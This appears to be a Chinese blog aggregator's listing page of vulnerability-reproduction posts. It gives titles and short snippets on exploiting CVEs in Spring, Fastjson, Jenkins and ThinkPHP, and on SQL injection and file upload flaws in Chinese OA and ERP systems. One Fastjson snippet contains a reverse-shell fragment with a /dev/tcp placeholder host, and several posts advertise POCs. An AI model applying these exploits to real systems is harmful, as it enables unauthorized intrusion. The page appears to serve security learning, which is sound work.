[漏洞复现]

网络安全(黑客)—自学

2.渗透技术掌握A.初级渗透首先要学习网络安全的渗透基础内容,包括信息收集,web安全,渗透工具精通,漏洞复现和实战漏洞挖掘B.高级渗透-分方向内容分很多但是整体所需要掌握的内容差
羊村最强沸羊羊·2023-12-01 08:01

网络安全应该怎么学?(0基础小白)

2.渗透技术掌握A.初级渗透首先要学习网络安全的渗透基础内容,包括信息收集,web安全,渗透工具精通,漏洞复现和实战漏洞挖掘B.高级渗透-分方向内容分很多但是整体所需要掌握的内容差
羊村最强沸羊羊·2023-12-01 08:29

Spring Framework远程代码执行漏洞 CVE-2022-22965 漏洞复现

SpringFramework远程代码执行漏洞CVE-2022-22965漏洞复现和相关利用工具名称:SpringFramework远程命令执行漏洞描述:Springcore是Spring系列产品中用来负责发现
梧六柒·2023-12-01 02:22

Spring Cloud Function Spel表达式注入 CVE-2022-22963 漏洞复现

SpringCloudFunctionSpel表达式注入CVE-2022-22963漏洞复现名称:SpringCloudFunctionSPEL远程代码执行描述:SpringCloudFunction是基于
梧六柒·2023-12-01 02:21

Couchdb 命令执行漏洞复现 (CVE-2017-12636)

Couchdb命令执行漏洞复现(CVE-2017-12636)1、下载couchdb.py2、修改目标和反弹地址3、Python3调用执行即可couchdb.py文件下载地址:https://github.com
梧六柒·2023-12-01 02:51

万户协同办公平台ezoffice未授权访问漏洞

文章目录0x01前言0x02漏洞描述0x03影响范围0x04漏洞环境0x05漏洞复现1.构造POC2.进行MD5值解密3.尝试进行登录0x06复现建议0x01前言本次测试仅供学习使用,如若非法他用,与本文作者无关
gaynell·2023-11-30 18:01

万户协同办公平台未授权访问漏洞复现

前言此文章仅用于技术交流,严禁用于对外发起恶意攻击!!!一、产品简介万户ezOFFICE协同管理平台涵盖门户自定义平台、信息知识平台管理、系统管理平台功能,它以工作流引擎为底层服务,以通讯沟通平台为交流手段,以门户自定义平台为信息推送显示平台,为用户提供集成的协同工作环境。二、漏洞描述该平台存在未授权访问漏洞,攻击者可以从evoInterfaceServlet接口获得系统登录账号和用MD5加密的密
明丨通·2023-11-30 18:31

漏洞复现】泛微 e-office v9.0任意文件上传漏洞(CNVD-2021-49104)

0x02影响范围泛微e-officeV9.00x03漏洞复现访问界面如下修改数据包如下浏览器访问/images/logo/logo-eoffice.php连接WebShell工具P
李火火安全阁·2023-11-30 18:31

漏洞复现】通达OA inc/package/down.php接口存在未授权访问漏洞 附POC

漏洞描述通达OA(OfficeAnywhere网络智能办公系统)是由通达信科科技自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。通达OA为各行业不同规模的众多用户提供信息化管理能力,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,帮助广大用户降低沟通和管理成本,提升生产和决策效率。此外,通达OA通过融合不同的信息化资源,打通信息“孤岛”,精细化
丢了少年失了心1·2023-11-30 18:30

【传送点】上千漏洞复现复现集合 exp poc 持续更新

一简介二传送【漏洞复现】OpenTSDB2.4.0命令注入(CVE-2020-35476)漏洞复现漏洞复现】熊海cms存在sql注入附poc【漏洞复现】ArrayVPN任意文件读取漏洞【漏洞复现】好视通视频会议系统
丢了少年失了心1·2023-11-30 18:00

万户协同办公平台 ezoffice未授权访问漏洞

二、影响版本万户ezoffice三、资产测绘hunterapp.name="万户EzofficeOA"登录页面四、漏洞复现GET/defaultroot/evoInterfaceSer
xiaokp7·2023-11-30 18:58

某 E-Office v9 任意文件上传漏洞复现实战

前言由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。本文章中的漏洞均为公开的漏洞收集,如果文章中的漏洞出现敏感内容产生了部分影响,请及时联系作者,望谅解。一、漏洞原理本次复现漏洞为未公开漏洞CNVD-2021-49104,该漏洞是由于e-office其上传模块中用户输入部分未能妥善处理,攻击者可以构造恶意的上传数据包,实现任意代码
0x6270·2023-11-30 18:55

漏洞复现】万户协同办公平台ezoffice SendFileCheckTemplateEdit.jsp接口存在SQL注入漏洞 附POC

漏洞描述万户ezOFFICE协同管理平台是一个综合信息基础应用平台。万户协同办公平台ezofficeSendFileCheckTemplateEdit.jsp接口存在SQL注入漏洞。免责声明技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息
丢了少年失了心1·2023-11-30 18:23

网络安全(黑客技术)—小白学习手册

2.渗透技术掌握A.初级渗透首先要学习网络安全的渗透基础内容,包括信息收集,web安全,渗透工具精通,漏洞复现和实战漏洞挖掘B.高级渗透-分方向内容分很多但是整体所需要掌握的内容差
羊村最强沸羊羊·2023-11-30 14:51

云时空社会化商业 ERP 系统 gpy 文件上传漏洞复现

0x01产品简介时空云社会化商业ERP(简称时空云ERP),该产品采用JAVA语言和Oracle数据库,融合用友软件的先进管理理念,汇集各医药企业特色管理需求,通过规范各个流通环节从而提高企业竞争力、降低人员成本,最终实现全面服务于医药批发、零售连锁企业的信息化建设的目标,是一款全面贴合最新GSP要求的医药流通行业一站式管理系统。0x02漏洞概述时空云社会化商业ERPgpy接口处存在文件上传漏洞,
OidBoy_G·2023-11-30 13:39

云时空社会化商业 ERP 系统 Shiro 反序列化漏洞复现

0x01产品简介时空云社会化商业ERP(简称时空云ERP),该产品采用JAVA语言和Oracle数据库,融合用友软件的先进管理理念,汇集各医药企业特色管理需求,通过规范各个流通环节从而提高企业竞争力、降低人员成本,最终实现全面服务于医药批发、零售连锁企业的信息化建设的目标,是一款全面贴合最新GSP要求的医药流通行业一站式管理系统。0x02漏洞概述云时空社会化商业ERP系统存在shiro反序列化漏洞
OidBoy_G·2023-11-30 13:09

云时空社会化商业 ERP 系统 service SQL 注入漏洞复现

0x01产品简介时空云社会化商业ERP(简称时空云ERP),该产品采用JAVA语言和Oracle数据库,融合用友软件的先进管理理念,汇集各医药企业特色管理需求,通过规范各个流通环节从而提高企业竞争力、降低人员成本,最终实现全面服务于医药批发、零售连锁企业的信息化建设的目标,是一款全面贴合最新GSP要求的医药流通行业一站式管理系统。0x02漏洞概述时空云社会化商业ERPservice接口处存在SQL
OidBoy_G·2023-11-30 13:09

H3C CVM 前台任意文件上传漏洞复现

0x01产品简介H3C公司依托其强大的技术实力、产品与服务优势,以及深入人心的以客户为中心的理念,为企业数据中心IaaS云计算基础架构提供最优化的虚拟化与云业务运营解决方案。通过H3CCASCVM虚拟化管理系统实现数据中心虚拟化环境的中央管理控制,以简洁的管理界面,统一管理数据中心内所有的物理资源和虚拟资源,不仅能提高管理员的管控能力、简化日常例行工作,更可降低IT环境的复杂度和管理成本。0x02
OidBoy_G·2023-11-30 13:30

Spring Cloud Function SpEL表达式命令注入(CVE-2022-22963)漏洞复现

一、漏洞简介SpringCloudFunction是一个用于构建和部署基于函数的微服务的框架。它使用SpEL表达式来处理函数的输入和输出。SpEL是一种强大的表达式语言,它允许开发人员在运行时动态地计算表达式。由于SpringCloudFunction中RoutingFunction类的apply方法将请求头中的"spring.cloud.function.routing-expression"参
YiHua_yiye·2023-11-30 12:22

vulhub struts2 s2-001漏洞复现

S2-001远程代码执行漏洞0x01原理该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用%{value}对提交的数据执行了一次OGNL表达式解析,所以可以直接构造Payload进行命令执行。0x02环境进入vluhubstrut
YiHua_yiye·2023-11-30 12:52

ThinkPHP5 5.0.23 远程代码执行漏洞复现

ThinkPHP55.0.23远程代码执行漏洞0x01形成原因是由于框架对控制器名没有进行敏感字符检测,导致在没有开启强制路由的情况下可能导致远程代码执行。0x02影响的版本5.0.23和5.1.31之前的所有版本0x03启动环境docker-composeup-d访问靶机ip+端口号80800x04漏洞利用使用burp抓到首页的包改变传参方式GET改为POST修改参数url参数/index.ph
YiHua_yiye·2023-11-30 12:52

利用Vulnhub复现漏洞 - ffmpeg 任意文件读取漏洞/SSRF漏洞 (CVE-2016-1897/CVE-2016-1898)

ffmpeg任意文件读取漏洞/SSRF漏洞(CVE-2016-1897/CVE-2016-1898)Vulnhub官方复现教程漏洞原理复现漏洞启动环境漏洞复现紧急加班去了Vulnhub官方复现教程https
建瓯最坏·2023-11-30 10:12

网络安全—小白自学

2.渗透技术掌握A.初级渗透首先要学习网络安全的渗透基础内容,包括信息收集,web安全,渗透工具精通,漏洞复现和实战漏洞挖掘B.高级渗透-分方向内容分很多但是整体所需要掌握的内容差
羊村最强沸羊羊·2023-11-30 09:30

Spring boot命令执行 (CVE-2022-22947)漏洞复现和相关利用工具

Springboot命令执行(CVE-2022-22947)漏洞复现和相关利用工具名称:spring命令执行(CVE-2022-22947)描述:SpringCloudGateway是Spring中的一个
梧六柒·2023-11-30 07:45

商品金额漏洞复现

修改商品金额漏洞复现以damicms为例安装damicms安装完成,进入网站首页注册用户注册成功登录用户填写会员资料填写成功修改金额打开首页——公司产品进行购买打开bp拦截,点击立即购买拦截成功,将price
西柠!·2023-11-30 01:45

海翔云平台 getylist_login.do SQL 注入漏洞复现

0x01产品简介海翔云平台一站式整体解决方案提供商,业务涵盖批发、连锁、零售行业ERP解决方案、wms仓储解决方案、电商、外勤、移动终端(PDA、APP、小程序)解决方案。0x02漏洞概述海翔云平台getylist_login.do接口处存在SQL注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库权限,除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,
OidBoy_G·2023-11-29 11:47

LD_PRELOAD劫持(超详细篇)

目录前提知识环境变量链接LD_PRELOADLD_LIBRARY_PATHELF文件/bin、/sbin、/usr/sbin、/usr/bin漏洞复现案例一(随机数劫持)案例二(ls的劫持)案例三(__
coleak·2023-11-29 10:23

了解 LD_PRELOAD及漏洞复现

一、了解LD_PRELOADLD_PRELOAD是Linux/Unix系统的一个环境变量,它影响程序的运行时的链接(Runtimelinker),它允许在程序运行前定义优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通过这个环境变量,我们可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖正常的函数库。(一)、程序的链接程序的链接可以分为以下三种静态链接
树上一太阳·2023-11-29 10:19

易宝OA系统ExecuteSqlForSingle接口SQL注入漏洞复现 [附POC]

文章目录易宝OA系统ExecuteSqlForSingle接口SQL注入漏洞复现[附POC]0x01前言0x02漏洞描述0x03影响版本0x04漏洞环境0x05漏洞复现1.访问漏洞环境2.构造POC3.
gaynell·2023-11-29 07:21

jenkins 代码执行 (CVE-2017-1000353)漏洞复现

jenkins代码执行(CVE-2017-1000353)漏洞复现名称:jenkins代码执行(CVE-2017-1000353)描述:Jenkins可以通过其网页界面轻松设置和配置,其中包括即时错误检查和内置帮助
梧六柒·2023-11-29 03:26

jekins CVE-2018-1000861 漏洞复现

jekinsCVE-2018-1000861漏洞复现‍名称:jenkins命令执行(CVE-2018-1000861)描述:Jenkins可以通过其网页界面轻松设置和配置,其中包括即时错误检查和内置帮助
梧六柒·2023-11-29 03:54

fastjson1.2.47RCE远程命令执行漏洞复现

fastjson1.2.47RCE远程命令执行漏洞复现漏洞背景在2019年6月,fastjson被爆出在fastjson&/dev/tcp/x.x.x.x/port0>&1"};Processpc=rt.exec
zyl404·2023-11-29 03:51

fastjson 1.2.47 远程命令执行漏洞

fastjson1.2.47远程命令执行漏洞文章目录fastjson1.2.47远程命令执行漏洞1在线漏洞解读:2环境搭建3影响版本:4漏洞复现4.1访问页面4.2bp抓包,修改参数5使用插件检测漏洞【
煜磊·2023-11-29 03:50

Fastjson 1.2.47 远程命令执行漏洞复现记录分享

Fastjson1.2.47远程命令执行漏洞复现前言环境要求环境准备靶机VPS漏洞复现前言Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。
YezIwnl·2023-11-29 03:46

vulhub复现之fastjson1.2.47漏洞复现

漏洞复现反弹shell前言:干什么事情都要坚持到底一定一定可以成功哒!!!学习真是痛并快乐着!在此鸣谢郭师傅对我的悉心教导!听我说谢谢你!看到这个漏洞我想先得知道什么是json?
小杜不饿·2023-11-29 03:15

【黑客】网络安全—小白自学笔记

2.渗透技术掌握A.初级渗透首先要学习网络安全的渗透基础内容,包括信息收集,web安全,渗透工具精通,漏洞复现和实战漏洞挖掘B.高级渗透-分方向内容分很多但是整体所需要掌握的内容差
羊村最强沸羊羊·2023-11-29 03:12

网络安全小白自学

2.渗透技术掌握A.初级渗透首先要学习网络安全的渗透基础内容,包括信息收集,web安全,渗透工具精通,漏洞复现和实战漏洞挖掘B.高级渗透-分方向内容分很多但是整体所需要掌握的内容差
羊村最强沸羊羊·2023-11-29 03:12

想成为网络安全工程师该如何学习?

2.渗透技术掌握A.初级渗透首先要学习网络安全的渗透基础内容,包括信息收集,web安全,渗透工具精通,漏洞复现和实战漏洞挖掘B.高级渗透-分方向内容分很多但是整体所需要掌握的内容差
羊村最强沸羊羊·2023-11-29 03:35

亿赛通电子文档安全管理系统UploadFileFromClientServiceForClient接口存在任意文件上传漏洞 附POC

1.亿赛通电子文档安全管理系统接口简介微信公众号搜索:南风漏洞复现文库该文章南风漏洞复现文库公众号首发亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱
sublime88·2023-11-29 02:38

用友NC word.docx接口存在任意文件读取漏洞 附POC

1.用友NC简介微信公众号搜索:南风漏洞复现文库该文章南风漏洞复现文库公众号首发用友网络是全球领先的企业与公共组织软件、云服务
sublime88·2023-11-29 02:38

通达OA inc/package/down.php接口存在未授权访问漏洞 附POC

1.通达OA接口简介微信公众号搜索:南风漏洞复现文库该文章南风漏洞复现文库公众号首发通达OA(Office
sublime88·2023-11-29 02:02

海康运行管理中心 RCE漏洞复现

0x01产品简介海康威视是以视频为核心的智能物联网解决方案和大数据服务提供商。海康运行管理中心是一款功能强大、易于使用的安防管理平台,能满足用户对视频监控、报警管理、设备配置和数据统计等方面的需求,帮助用户建立高效、智能的安防系统。0x02漏洞概述海康运行管理中心系统使用低版本的fastjson,攻击者可在未鉴权情况下获取服务器权限,且由于存在相关依赖,即使服务器不出网无法远程加载恶意类也可通过本
OidBoy_G·2023-11-28 22:34

泛微E-Office SQL注入漏洞复现

0x01产品简介泛微E-Office是一款标准化的协同OA办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。0x02漏洞概述泛微e-officejson_common.php、flow_xml.php、sms_page.php、getUserLists、detail.php、Init.ph
OidBoy_G·2023-11-28 22:34

业务逻辑漏洞原理及复现

业务逻辑漏洞复现文章目录业务逻辑漏洞复现什么是业务逻辑漏洞验证码绕过漏洞复现抓包1分钱购买商品dami_5.4逻辑漏洞复现皮卡丘验证码绕过什么是业务逻辑漏洞由于开发者的逻辑不严谨,造成的程序异常由于开发者的逻辑不严谨造成的程序功能异常比如某一个购物软件使用
抠脚大汉在网络·2023-11-28 17:32

Nexus Repository Manager3远程命令执行漏洞复现CVE-2020-10199

0x00简介nexus的全称是NexusRepositoryManager,是Sonatype公司的一个产品。它是一个强大的仓库管理器,极大地简化了内部仓库的维护和外部仓库的访问。主要用它来搭建公司内部的maven私服。但是它的功能不仅仅是创建maven私有仓库这么简单,还可以作为nuget、docker、npm、bower、pypi、rubygems、gitlfs、yum、go、apt等的私有仓
5f4120c4213b·2023-11-28 15:53

Junos webauth_operation.php 文件上传漏洞复现(CVE-2023-36844)

0x01产品简介Junos是JuniperNetworks生产的一款可靠的高性能网络操作系统。0x02漏洞概述Junoswebauth_operation.php接口处存在文件上传漏洞,未经身份认证的攻击者可利用Junos操作系统的J-Web服务/webauth_operation.php路由上传phpwebshell,通过?PHPRC参数进行包含,进入控制整个web服务器。0x03复现环境FOF
OidBoy_G·2023-11-28 07:11

广联达linkworks 文件上传漏洞复现

0x01产品简介广联达LinkWorks(也称为GlinkLink或GTP-LinkWorks)是广联达公司(Glodon)开发的一种BIM(建筑信息模型)协同平台。广联达是中国领先的数字建造技术提供商之一,专注于为建筑、工程和建筑设计行业提供数字化解决方案。0x02漏洞概述由于广联达LinkWorks/GB/LK/ArchiveManagement/Js/GWGDWebService.asmx接
OidBoy_G·2023-11-28 07:10

东胜物流软件 SQL注入漏洞复现

0x01产品简介东胜物流软件是一款致力于为客户提供IT支撑的SOP,帮助客户大幅提高工作效率,降低各个环节潜在风险的物流软件。0x02漏洞概述东胜物流软件TCodeVoynoAdapter.aspx、/TruckMng/MsWlDriver/GetDataList、/MvcShipping/MsBaseInfo/SaveUserQuerySetting等接口处存在SQL注入漏洞,攻击者除了可以利用
OidBoy_G·2023-11-28 07:10

金蝶Apusic应用服务器 任意文件上传漏洞复现

0x01产品简介金蝶Apusic应用服务器(ApusicApplicationServer,AAS)是一款标准、安全、高效、集成并具丰富功能的企业级应用服务器软件,全面支持JakartaEE8/9的技术规范,提供满足该规范的Web容器、EJB容器以及WebService容器等,支持Websocket1.1、Servlet4.0、HTTP2.0等最新的技术规范,为企业级应用的便捷开发、灵活部署、可靠
OidBoy_G·2023-11-28 07:33

泛微E-Cology SQL注入漏洞复现【QVD-2023-15672】

泛微E-CologySQL注入漏洞复现【QVD-2023-15672】一、产品简介二、漏洞概述三、影响范围四、复现环境五、漏洞复现六、修复建议免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失
安全攻防赵小龙·2023-11-28 05:58
上一页 12 13 14 15 16 17 18 19 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他